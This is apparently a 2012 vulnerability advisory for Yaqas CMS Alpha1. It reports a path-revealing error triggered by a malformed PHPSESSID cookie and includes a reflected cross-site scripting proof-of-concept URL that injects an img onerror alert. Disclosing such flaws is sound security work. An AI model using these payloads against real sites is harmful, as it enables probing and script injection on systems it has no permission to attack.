# TITLE ....... # Yaqas CMS Alpha1 Information Disclosure .................................... #
# DATE ........ # 25.03.2012 .......................................... #
# AUTOHR ...... # http://hauntit.blogspot.com ......................... #
# SOFT LINK ... # YAQAS - Yet Another Question & Answer System @ google ....... #
# SOFT Copyright# "(C) 2012  Karpouzas George" * ................................. #
# VERSION ..... # Alpha1 ............................................... #
# TESTED ON ... # LAMP ................................................ #
# ..................................................................... #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)

#............................................#
# 2. What is the type of vulnerability?
# 2.1 information disclosure 

If we'll send PHPSESSID = %3b)() , error information (maybe visible only in src) should be like this:

"Warning: session_start(): 
The session id is too long or contains illegal characters, valid characters 
are a-z, A-Z, 0-9 and '-,' in /your/www/yaqas-release-alpha1/src/lib/session.php on line 32"
  
# 2.2 btw:
http://yaqas-release-alpha1/src/index.php?q=%29%2f*%20]]%3E%20*%2f%3Cimg%20src%3dxxx%20onerror%3dalert%28123123123123%29%3E&type=nhf


#............................................#
# 3. Where is bug :)


#............................................#
# 4. More...

- (*) from license : YAQAS - Yet Another Question & Answer System // Copyright (C) 2012  Karpouzas George
- http://www.google.com
- http://hauntit.blogspot.com
- http://portswigger.net

#............................................#
# Ask me about new projects...
#
# Best regards
#